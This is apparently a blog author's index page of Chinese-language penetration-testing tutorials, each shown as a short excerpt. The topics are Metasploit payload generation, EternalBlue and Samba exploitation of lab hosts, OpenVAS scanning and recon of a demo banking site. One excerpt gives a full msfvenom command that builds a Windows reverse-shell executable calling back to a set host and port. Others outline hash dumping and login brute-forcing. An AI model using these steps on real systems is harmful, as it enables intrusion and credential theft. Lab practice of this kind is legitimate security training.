![](https://img-blog.csdnimg.cn/20201014180756930.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
metasploit
click#15
这个作者很懒,什么都没留下…
展开
-
MSF攻击载荷的生成
1、查看该模块的可用参数msfvenom -p windows/shell_reverse_tcp --list-options2、生成攻击载荷msfvenom -p windows/shell_reverse_tcp LHOST=10.180.7.20 LPORT=31337 -f exe -o payload1.exe其中:-f 表示输出格式-o 表示保存payload为一个...原创 2019-10-30 13:54:07 · 1588 阅读 · 0 评论 -
kail下使用exploit/windows/smb/ms17_010_eternalblue攻击win2k7练习meterpreter
1、use exploit/windows/smb/ms17_010_eternalblueoptions和payload设置如下2、攻击成功3、截屏meterpreter的screenshot命令可以获取活动用户的桌面截屏保存到相应目录4、sysinfo这个命令可以获取系统运行的平台5、获取靶机上的账户密码哈希值传递哈希值(失败)6、Meterpreter跳转,并保...原创 2019-10-30 10:53:31 · 2409 阅读 · 0 评论 -
使用openvas扫描metasploitable2
1、进入configuration下的targets,点击坐上角的星号,创建扫描目标2、配置目标扫描任务进入scans下的tasks,点击左上角的星号,新建目标扫描任务3、点击绿色开始按钮,开始扫描任务...原创 2019-10-29 14:38:52 · 319 阅读 · 0 评论 -
安装openvas
1、升级系统apt-get updateapt-get upgrade2、更新完成后安装openvasapt-get install openvas开始安装openvas,安装的过程中系统提示,需要更新libs,按默认选择,更新内置的libs就行了3、等待libs全部跟新完成,输入如下openvas-setup安装完成4、修改默认配置修改默认密码前,需停止服务openvas...原创 2019-10-29 14:06:52 · 715 阅读 · 1 评论 -
metasploit--multi/samba/usermap_script
metasploit的multi/samba/usermap_script使用1、search samba在渗透代码库中找出攻击Samba服务的模块2、use exploit/multi/samba/usermap_script使用该模块进行渗透攻击3、show payloads查看与该渗透攻击模块相兼容的攻击载荷4、set payload cmd/unix/bind_netc...原创 2019-10-28 10:24:01 · 501 阅读 · 0 评论 -
msfcli 不能使用,在新版metasploit不再有效,推荐使用msfconsole
msfcli介绍及使用msfcli命令行程序是Metaploit框架为脚本自动化处理及与其他命令行工具互操作而设计的一种用户接口,它可以直接从命令行shell执行,并允许你通过linux的管道机制将结果输出重定向给其他程序进行处理在新版本的metasploit中,msfcli不再支持,推荐使用msfconsole1、编写攻击脚本,将在msfconsole中的各项设置写入该脚本中2、执行脚...原创 2019-10-28 10:43:26 · 802 阅读 · 0 评论 -
test.fire渗透测试
testfire.net 是一包含很多典型web漏洞的模拟银行网站,是IBM公司为了演示其著名的web应用安全扫面铲平AppScan的强大功能所建立的测试站点一、通过DNS和IP地址挖掘目标网络信息1、whois域名注册信息查询whois是一个用来查询域名注册信息数据库的工具,一般的域名注册信息包含域名所有者、服务商、管理员邮件地址、域名注册日期和过期信息2、nslookup和dig域名...原创 2019-10-28 15:24:55 · 4105 阅读 · 0 评论 -
metasploit服务扫描与查点
在metasploit中scanner辅助模块中,有很多用于服务扫描和查点的工具,常以[service_name]_version和[service_name]_login命名[service_name]_version可用于遍历网络中包含了某种服务的主机,并进一步确定服务的版本[service_name]_login可对某种服务进行口令探测攻击1、Telnet服务扫描2、SSH服务扫描...原创 2019-10-28 16:47:27 · 291 阅读 · 0 评论